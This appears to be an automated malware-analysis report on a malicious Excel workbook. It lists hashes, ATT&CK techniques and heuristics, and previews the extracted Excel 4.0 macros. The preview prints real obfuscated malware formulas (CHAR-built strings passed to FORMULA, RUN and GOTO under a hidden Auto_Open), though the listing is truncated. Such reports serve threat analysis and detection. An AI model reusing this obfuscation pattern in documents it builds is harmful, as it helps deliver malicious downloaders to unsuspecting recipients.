Office (OLE) malware analysis — malicious · 7c8bc9a82dce5503

MALICIOUS

Office (OLE)

286.0 KB Created: 2020-05-15 13:57:02 Authoring application: Microsoft Excel First seen: 2020-09-07

MD5: c70d65226d3f4b345f15f923aa19cd9d SHA-1: 3de79a1aeab21a10af17daf7214ce2c49896984a SHA-256: 7c8bc9a82dce5503ce3753e919d96495f63536b4adb5b427ffb008f93fe8ac14

140 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains critical heuristics indicating obfuscated Excel 4.0 macros with an Auto_Open execution chain. The macro attempts to construct a string using CHAR functions and then executes it via the RUN function, likely to download and execute a second-stage payload. The presence of an Auto_Open entry suggests it's intended to be delivered as a malicious attachment.

Heuristics 3

Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME

oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
Obfuscated XLM Auto_Open execution chain critical OLE_XLM_OBFUSCATED_AUTOEXEC_CHAIN

Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and an obfuscated formula execution chain. The macro builds strings through FORMULA(CHAR(...)), primes state with SET.VALUE / GET.CELL / GOTO, and transfers control through RUN(). This is a high-confidence XLM malware pattern.
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN

Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 125555 bytes

Filename	Kind	Source	Size
`xlm_macros.txt`	xlm-macro	oletools.olevba.extract_all_macros (XLM macro listing)	125555 bytes
SHA-256: `a754c4853fad3adffb9bdc51a2a2555cf89121ae3e4295ba29e50354b9a9dc57`
Preview script First 1,000 lines of the extracted script ' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet ' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!IB43688 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' Sheet,CZ137,"",2.03571428571428558740 ' Sheet,HX151,"FORMULA(CHAR(ET6229+CX34730)&CHAR(J58770/GP19178)&CHAR(J58770+EX40789)&CHAR(CW62939/HB7020)&CHAR(ID39774+GB61268)&CHAR(J58770/J7812)&CHAR(CL36550+GA42252)&CHAR(FG16463/HQ50463)&CHAR(DY41316+BE62937)&CHAR(ID39774BD38285)&CHAR(ET6229-BP41518)&CHAR(CX41108-HI37898)&CHAR(DG47533/FH8596)&CHAR(FG16463+EC40862)&CHAR(CL36550FA50335)&CHAR(DG47533-FY4491)&CHAR(ID39774/D41914)&CHAR(ID39774-EK45084)&CHAR(CL36550-HL50046)&CHAR(ET6229DG38371)&CHAR(ET6229/J12872)&CHAR(DG47533+EQ39845)&CHAR(ET6229DM22022)&CHAR(DY41316-JR3094)&CHAR(J58770-F16917)&CHAR(CW62939A45734)&CHAR(ID39774IT29139)&CHAR(ET6229-JG1092)&CHAR(CW62939JH19166)&CHAR(FG16463+HZ56626)&CHAR(CX41108-FJ55179)&CHAR(ID39774-EE13627)&CHAR(DG47533-BO45856)&CHAR(CL36550/HE54772)&CHAR(ID39774+FV22426)&CHAR(CL36550-EF49670)&CHAR(J58770/Q59164)&CHAR(FG16463BJ16497)&CHAR(J58770/BT2527)&CHAR(CL36550/DC18660)&CHAR(ET6229+EQ55205)&CHAR(ET6229CA58126)&CHAR(J58770+M19285)&CHAR(ET6229+JU53436)&CHAR(DY41316/FZ15038)&CHAR(CW62939GP17371)&CHAR(DG47533-FG4789),HX152)","" ' Sheet,HX153,RUN(IO18419),"" ' Sheet,CU163,"",45.00000000000000000000 ' Sheet,R193,"",-35.50000000000000000000 ' Sheet,BV292,"",0.24152542372881355415 ' Sheet,JC320,"",311.37500000000000000000 ' Sheet,ET328,"",438.00000000000000000000 ' Sheet,CP356,"",-60.50000000000000000000 ' Sheet,FC361,"",-13.39999999999999857891 ' Sheet,HN377,"",-39.09999999999999431566 ' Sheet,DE397,"",10.79296875000000000000 ' Sheet,DN436,"",102.50000000000000000000 ' Sheet,DB453,"",-0.16955017301038061150 ' Sheet,HG538,"",-244.37500000000000000000 ' Sheet,GN539,"",-1.05000061035156244671 ' Sheet,CG543,"",198.75000000000000000000 ' Sheet,FX546,"",58.50000000000000000000 ' Sheet,V567,GOTO(FD33099),"" ' Sheet,CS605,"",0.22058823529411764053 ' Sheet,CI615,"",241.37500000000000000000 ' Sheet,BZ616,"",-0.16608996539792386660 ' Sheet,H630,"",-68.50000000000000000000 ' Sheet,CS643,"",154.75000000000000000000 ' Sheet,IL643,"",12.76666666666666749563 ' Sheet,HK651,"",197.75000000000000000000 ' Sheet,EB676,"",-0.78987341772151897779 ' Sheet,BA718,"",118.00000000000000000000 ' Sheet,Z790,"",292.00000000000000000000 ' Sheet,IW792,"",-0.31487889273356400865 ' Sheet,O798,"",0.13988095238095238360 ' Sheet,EW838,"",-0.08333333333333332871 ' Sheet,DY856,"",0.07203389830508474811 ' Sheet,J877,"",-0.01126760563380281750 ' Sheet,S892,"",73.80003906250000511591 ' Sheet,IL901,"",-0.63396126415094344875 ' Sheet,BN919,"",0.93134328358208950949 ' Sheet,ES924,"",287.00000000000000000000 ' Sheet,HI993,"",1.16987179487179493442 ' Sheet,DB997,"",0.95806451612903220649 ' Sheet,JP1017,"",-360.00000000000000000000 ' Sheet,BW1026,"",-4.50000000000000000000 ' Sheet,N1027,"",-3.67741935483870951984 ' Sheet,JG1092,"",-75.00000000000000000000 ' Sheet,EI1100,"",-4.18840579710144922387 ' Sheet,HE1120,"",500.50000000000000000000 ' Sheet,GI1165,"",5.34426229508196737328 ' Sheet,DK1182,"",-19.09999999999999431566 ' Sheet,GV1205,"",1.31410256410256409687 ' Sheet,GX1254,"",26.50000000000000000000 ' Sheet,FR1379,"",-78.50000000000000000000 ' Sheet,FI1423,"",-1.30952380952380953438 ' Sheet,T1450,"",-11.90000000000000568434 ' Sheet,Y1464,"",-3.00595238095238093123 ' Sheet,BT1515,"",-426.00000000000000000000 ' Sheet,FQ1530,"",-27.90000000000000568434 ' Sheet,CB1560,"",380.00000000000000000000 ' Sheet,JF1622,"",3.73626373626373631254 ' Sheet,GB1655,"",371.00000000000000000000 ' Sheet,GP1675,"",-87.00000000000000000000 ' Sheet,DQ1699,"",-0.39529411764705885135 ' Sheet,H1708,"",198.75000000000000000 ... (truncated)

SHA-256: a754c4853fad3adffb9bdc51a2a2555cf89121ae3e4295ba29e50354b9a9dc57

Preview script

First 1,000 lines of the extracted script

' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Sheet
' 0018     28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d  Sheet!IB43688 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  Sheet,CZ137,"",2.03571428571428558740
'  Sheet,HX151,"FORMULA(CHAR(ET6229+CX34730)&CHAR(J58770/GP19178)&CHAR(J58770+EX40789)&CHAR(CW62939/HB7020)&CHAR(ID39774+GB61268)&CHAR(J58770/J7812)&CHAR(CL36550+GA42252)&CHAR(FG16463/HQ50463)&CHAR(DY41316+BE62937)&CHAR(ID39774*BD38285)&CHAR(ET6229-BP41518)&CHAR(CX41108-HI37898)&CHAR(DG47533/FH8596)&CHAR(FG16463+EC40862)&CHAR(CL36550*FA50335)&CHAR(DG47533-FY4491)&CHAR(ID39774/D41914)&CHAR(ID39774-EK45084)&CHAR(CL36550-HL50046)&CHAR(ET6229*DG38371)&CHAR(ET6229/J12872)&CHAR(DG47533+EQ39845)&CHAR(ET6229*DM22022)&CHAR(DY41316-JR3094)&CHAR(J58770-F16917)&CHAR(CW62939*A45734)&CHAR(ID39774*IT29139)&CHAR(ET6229-JG1092)&CHAR(CW62939*JH19166)&CHAR(FG16463+HZ56626)&CHAR(CX41108-FJ55179)&CHAR(ID39774-EE13627)&CHAR(DG47533-BO45856)&CHAR(CL36550/HE54772)&CHAR(ID39774+FV22426)&CHAR(CL36550-EF49670)&CHAR(J58770/Q59164)&CHAR(FG16463*BJ16497)&CHAR(J58770/BT2527)&CHAR(CL36550/DC18660)&CHAR(ET6229+EQ55205)&CHAR(ET6229*CA58126)&CHAR(J58770+M19285)&CHAR(ET6229+JU53436)&CHAR(DY41316/FZ15038)&CHAR(CW62939*GP17371)&CHAR(DG47533-FG4789),HX152)",""
'  Sheet,HX153,RUN(IO18419),""
'  Sheet,CU163,"",45.00000000000000000000
'  Sheet,R193,"",-35.50000000000000000000
'  Sheet,BV292,"",0.24152542372881355415
'  Sheet,JC320,"",311.37500000000000000000
'  Sheet,ET328,"",438.00000000000000000000
'  Sheet,CP356,"",-60.50000000000000000000
'  Sheet,FC361,"",-13.39999999999999857891
'  Sheet,HN377,"",-39.09999999999999431566
'  Sheet,DE397,"",10.79296875000000000000
'  Sheet,DN436,"",102.50000000000000000000
'  Sheet,DB453,"",-0.16955017301038061150
'  Sheet,HG538,"",-244.37500000000000000000
'  Sheet,GN539,"",-1.05000061035156244671
'  Sheet,CG543,"",198.75000000000000000000
'  Sheet,FX546,"",58.50000000000000000000
'  Sheet,V567,GOTO(FD33099),""
'  Sheet,CS605,"",0.22058823529411764053
'  Sheet,CI615,"",241.37500000000000000000
'  Sheet,BZ616,"",-0.16608996539792386660
'  Sheet,H630,"",-68.50000000000000000000
'  Sheet,CS643,"",154.75000000000000000000
'  Sheet,IL643,"",12.76666666666666749563
'  Sheet,HK651,"",197.75000000000000000000
'  Sheet,EB676,"",-0.78987341772151897779
'  Sheet,BA718,"",118.00000000000000000000
'  Sheet,Z790,"",292.00000000000000000000
'  Sheet,IW792,"",-0.31487889273356400865
'  Sheet,O798,"",0.13988095238095238360
'  Sheet,EW838,"",-0.08333333333333332871
'  Sheet,DY856,"",0.07203389830508474811
'  Sheet,J877,"",-0.01126760563380281750
'  Sheet,S892,"",73.80003906250000511591
'  Sheet,IL901,"",-0.63396126415094344875
'  Sheet,BN919,"",0.93134328358208950949
'  Sheet,ES924,"",287.00000000000000000000
'  Sheet,HI993,"",1.16987179487179493442
'  Sheet,DB997,"",0.95806451612903220649
'  Sheet,JP1017,"",-360.00000000000000000000
'  Sheet,BW1026,"",-4.50000000000000000000
'  Sheet,N1027,"",-3.67741935483870951984
'  Sheet,JG1092,"",-75.00000000000000000000
'  Sheet,EI1100,"",-4.18840579710144922387
'  Sheet,HE1120,"",500.50000000000000000000
'  Sheet,GI1165,"",5.34426229508196737328
'  Sheet,DK1182,"",-19.09999999999999431566
'  Sheet,GV1205,"",1.31410256410256409687
'  Sheet,GX1254,"",26.50000000000000000000
'  Sheet,FR1379,"",-78.50000000000000000000
'  Sheet,FI1423,"",-1.30952380952380953438
'  Sheet,T1450,"",-11.90000000000000568434
'  Sheet,Y1464,"",-3.00595238095238093123
'  Sheet,BT1515,"",-426.00000000000000000000
'  Sheet,FQ1530,"",-27.90000000000000568434
'  Sheet,CB1560,"",380.00000000000000000000
'  Sheet,JF1622,"",3.73626373626373631254
'  Sheet,GB1655,"",371.00000000000000000000
'  Sheet,GP1675,"",-87.00000000000000000000
'  Sheet,DQ1699,"",-0.39529411764705885135
'  Sheet,H1708,"",198.75000000000000000
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.